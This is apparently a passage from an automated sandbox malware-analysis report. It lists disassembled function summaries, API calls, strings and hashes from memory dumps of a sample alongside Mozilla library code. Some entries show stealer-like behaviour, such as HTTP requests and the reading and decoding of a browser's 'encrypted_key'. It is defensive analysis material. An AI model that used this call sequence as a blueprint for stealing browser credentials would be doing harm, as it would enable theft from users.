CloseHandle.KERNEL32(?), ref: 6CBDED28
free.MOZGLUE(00000000), ref: 6CBDED2F
ReleaseSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBDED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CBDEC94

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 8749e1807172460271aaa425a482efa94dc46c93e1ad0d2bb0b1a027f7cf1c80
Instruction ID: 0fe995e6f37d7cb9a4b457a005ad776a9eebac83ebccd33425a95a2b127af269
Opcode Fuzzy Hash: 8749e1807172460271aaa425a482efa94dc46c93e1ad0d2bb0b1a027f7cf1c80
Instruction Fuzzy Hash: 0521B1B5600194AFDB009F66D815B9EBB79FF4626CF154210F81897F41DB31A8158FA2

Function 007752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 00766280: InternetOpenA.WININET(00780DFE,00000001,00000000,00000000,00000000), ref: 007662E1
Part of subcall function 00766280: StrCmpCA.SHLWAPI(?,0125E978), ref: 00766303
Part of subcall function 00766280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00766335
Part of subcall function 00766280: HttpOpenRequestA.WININET(00000000,GET,?,0125E230,00000000,00000000,00400100,00000000), ref: 00766385
Part of subcall function 00766280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007663BF
Part of subcall function 00766280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007663D1

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00775318
lstrlen.KERNEL32(00000000), ref: 0077532F

Part of subcall function 00778E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00775364
lstrlen.KERNEL32(00000000), ref: 00775383
lstrlen.KERNEL32(00000000), ref: 007753AE

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Strings

ERROR, xrefs: 00775432
ERROR, xrefs: 007754A9
ERROR, xrefs: 0077530A
ERROR, xrefs: 007753B9
ERROR, xrefs: 0077546F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 11ec3d984d9b998a7958b128673b60d1cfe3af31d305cd43bfc37633e669f517
Instruction ID: 2beb1f3ab8773847d3748244f828f05adc8f2fe19caa587b72c85dc61d120699
Opcode Fuzzy Hash: 11ec3d984d9b998a7958b128673b60d1cfe3af31d305cd43bfc37633e669f517
Instruction Fuzzy Hash: 4151F070910148EBDF14FF60CD9AAEE7779AF50381F508028F41E5A592EF786B46CB92

Function 6CB93480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CB93492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CB934A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CB934EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CB9350E
__Init_thread_footer.LIBCMT ref: 6CB93522
__aulldiv.LIBCMT ref: 6CB93552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CB9357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CB93592

Part of subcall function 6CBCAB89: EnterCriticalSection.KERNEL32(6CC1E370,?,?,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284), ref: 6CBCAB94
Part of subcall function 6CBCAB89: LeaveCriticalSection.KERNEL32(6CC1E370,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CBCABD1

Strings

kernel32.dll, xrefs: 6CB934EA
GetSystemTimePreciseAsFileTime, xrefs: 6CB93508

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: fea90f3224935eca8147835dbf7e43ba73dbf9203b038be26a12bbefa15a0096
Instruction ID: 2d32301a2115791794b47daf687886dc3b04f2761399f018bf700f03cbe9be8d
Opcode Fuzzy Hash: fea90f3224935eca8147835dbf7e43ba73dbf9203b038be26a12bbefa15a0096
Instruction Fuzzy Hash: 2A3150B1B002459FDF04DFBAC869AAE77B5FB4A305F104429E505D3B60EA74D905CF61

Function 6CB94480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CBD4843,?), ref: 6CB945F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CBD4843,?), ref: 6CB9468A
free.MOZGLUE(?,?,?,?,?,?,6CBD4843,?), ref: 6CB946C9
free.MOZGLUE(?), ref: 6CB946EF
free.MOZGLUE(?), ref: 6CB94712
free.MOZGLUE(?), ref: 6CB94735
free.MOZGLUE(?), ref: 6CB94758
free.MOZGLUE(?), ref: 6CB9477B
free.MOZGLUE(?), ref: 6CB9479E

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 5ac04ad679b80dcfd0b7b3aee3943a3fde7b7a700c22b02a4c431b397bf6ae54
Instruction ID: 0a2ee100e16111150574c8f302a28bb73ed22af4bf3c5cf854e34356ae85f73d
Opcode Fuzzy Hash: 5ac04ad679b80dcfd0b7b3aee3943a3fde7b7a700c22b02a4c431b397bf6ae54
Instruction Fuzzy Hash: 9FB1F371A001908FDB189F7CD8D076D76A2AF43328F184679E836DBB96D73498448F92

Function 007712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: c1e7e30c6b636f24eed6a646c34b945a77bcdb700258d31a148cc4adcddd7993
Instruction ID: 09429ae97e3ee002666f30736865ddb0c1a36ad77b28cadc673348a7d11d241d
Opcode Fuzzy Hash: c1e7e30c6b636f24eed6a646c34b945a77bcdb700258d31a148cc4adcddd7993
Instruction Fuzzy Hash: 7DC170B5940109ABCF14EF60DC8DEEE7378BF94344F008599A50EA7141DB78AA85DF92

Function 00774280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 007742EC
lstrcat.KERNEL32(?,0125E3F8), ref: 0077430B
lstrcat.KERNEL32(?,?), ref: 0077431F
lstrcat.KERNEL32(?,0125D580), ref: 00774333

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 00778D90: GetFileAttributesA.KERNEL32(00000000,?,00761B54,?,?,0078564C,?,?,00780E1F), ref: 00778D9F

Part of subcall function 00769CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00769D39

Part of subcall function 007699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
Part of subcall function 007699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
Part of subcall function 007699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
Part of subcall function 007699C0: ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
Part of subcall function 007699C0: LocalFree.KERNEL32(0076148F), ref: 00769A90
Part of subcall function 007699C0: CloseHandle.KERNEL32(000000FF), ref: 00769A9A

Part of subcall function 007793C0: GlobalAlloc.KERNEL32(00000000,007743DD,007743DD), ref: 007793D3

StrStrA.SHLWAPI(?,0125E4D0), ref: 007743F3
GlobalFree.KERNEL32(?), ref: 00774512

Part of subcall function 00769AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769AEF
Part of subcall function 00769AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00764EEE,00000000,?), ref: 00769B01
Part of subcall function 00769AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769B2A
Part of subcall function 00769AC0: LocalFree.KERNEL32(?,?,?,?,00764EEE,00000000,?), ref: 00769B3F

lstrcat.KERNEL32(?,00000000), ref: 007744A3
StrCmpCA.SHLWAPI(?,007808D1), ref: 007744C0
lstrcat.KERNEL32(00000000,00000000), ref: 007744D2
lstrcat.KERNEL32(00000000,?), ref: 007744E5
lstrcat.KERNEL32(00000000,00780FB8), ref: 007744F4

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 5b131bd25a817e511bcba8c992a982853a0a853aa4967e2d3904485d20f1bfb0
Instruction ID: 43081ba0fcbe197c23a2c853cfc087264093e1da772dce376bccd191024e4a54
Opcode Fuzzy Hash: 5b131bd25a817e511bcba8c992a982853a0a853aa4967e2d3904485d20f1bfb0
Instruction Fuzzy Hash: BA7126B6910208A7DF54EBA4DC49FEE7379AF88300F048598F60996181DB38DB55DF91

Function 6CBFAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CBFAC52
CreateFileMappingW.KERNEL32 ref: 6CBFAC7D
GetSystemInfo.KERNEL32 ref: 6CBFAC98
MapViewOfFile.KERNEL32 ref: 6CBFACB0
GetSystemInfo.KERNEL32 ref: 6CBFACCD
MapViewOfFile.KERNEL32 ref: 6CBFAD05
UnmapViewOfFile.KERNEL32 ref: 6CBFAD1C
CloseHandle.KERNEL32 ref: 6CBFAD28
UnmapViewOfFile.KERNEL32 ref: 6CBFAD37
CloseHandle.KERNEL32 ref: 6CBFAD43
CloseHandle.KERNEL32 ref: 6CBFAD67

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: e36e4d67285559a293acc6d1a9c342f1ac64e6c6295ed8f1e1fda86faffc7388
Instruction ID: 64039f023d39d6397d118548b8de3b341d220c76c22792c69a8f7c84f6111022
Opcode Fuzzy Hash: e36e4d67285559a293acc6d1a9c342f1ac64e6c6295ed8f1e1fda86faffc7388
Instruction Fuzzy Hash: E6318BB1A047458FDB00AF79C64926EBBF0FF85305F018A2DE89987701EB709499CF92

Function 6CBEDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CBEDDCF

Part of subcall function 6CBCFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBCFA4B

Part of subcall function 6CBE90E0: free.MOZGLUE(?,00000000,?,?,6CBEDEDB), ref: 6CBE90FF
Part of subcall function 6CBE90E0: free.MOZGLUE(?,00000000,?,?,6CBEDEDB), ref: 6CBE9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBEDE0D
free.MOZGLUE(00000000), ref: 6CBEDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBEDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBEDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBEDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CBDDEFD,?,6CBA4A68), ref: 6CBEDF32

Part of subcall function 6CBEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBEDB86
Part of subcall function 6CBEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBEDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CBDDEFD,?,6CBA4A68), ref: 6CBEDF65
free.MOZGLUE(?), ref: 6CBEDF80

Part of subcall function 6CBB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBB5EDB
Part of subcall function 6CBB5E90: memset.VCRUNTIME140(6CBF7765,000000E5,55CCCCCC), ref: 6CBB5F27
Part of subcall function 6CBB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBB5FB2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: cff3d4cce154cf8a3c750964d46674a99c7ad0c43652efa330ee44b098b4f367
Instruction ID: e7b4802ee506a2fe5283e034aca6da4f6bffaccc9e26d3424498a3c171a6222c
Opcode Fuzzy Hash: cff3d4cce154cf8a3c750964d46674a99c7ad0c43652efa330ee44b098b4f367
Instruction Fuzzy Hash: AA51C5726016809BDB118B38E8846AE7376BFD9B88B950519D81A53B00DBB1F919CBC3

Function 6CBCCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CB931A7), ref: 6CBCCDDD

Strings

<jemalloc>, xrefs: 6CBCCF9F, 6CBCCFB3
: (malloc) Error in VirtualFree(), xrefs: 6CBCCFA4, 6CBCCFB8

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 44cc497af3a55240c6e57f57f3300de545732fcdcd0f31b8269be45969a65c89
Instruction ID: 5d1aba24b793bb7a6fd33c322baf0a7afc90440f90143bdac613aa99abc399b7
Opcode Fuzzy Hash: 44cc497af3a55240c6e57f57f3300de545732fcdcd0f31b8269be45969a65c89
Instruction Fuzzy Hash: 2E31B0707452465BFF00AFAA8C56BAE7A75FF55758F204019E610EBF80EB70E4058BA3

Function 6CB9ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB9F100: LoadLibraryW.KERNEL32(shell32,?,6CC0D020), ref: 6CB9F122
Part of subcall function 6CB9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CB9F132

moz_xmalloc.MOZGLUE(00000012), ref: 6CB9ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB9EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CB9EDCC
CreateFileW.KERNEL32 ref: 6CB9EE08
free.MOZGLUE(00000000), ref: 6CB9EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CB9EE32

Part of subcall function 6CB9EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CB9EBB5
Part of subcall function 6CB9EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CBCD7F3), ref: 6CB9EBC3
Part of subcall function 6CB9EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CBCD7F3), ref: 6CB9EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CB9EDC1

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: c7a2ffa20eb874c26561cfc2e074fab68d937a6d3177416d3ce1991c78784f91
Instruction ID: f0c4bece514f8e6980a73073c4153ceb0be00b9e101ec9aa346ecb912509eb7e
Opcode Fuzzy Hash: c7a2ffa20eb874c26561cfc2e074fab68d937a6d3177416d3ce1991c78784f91
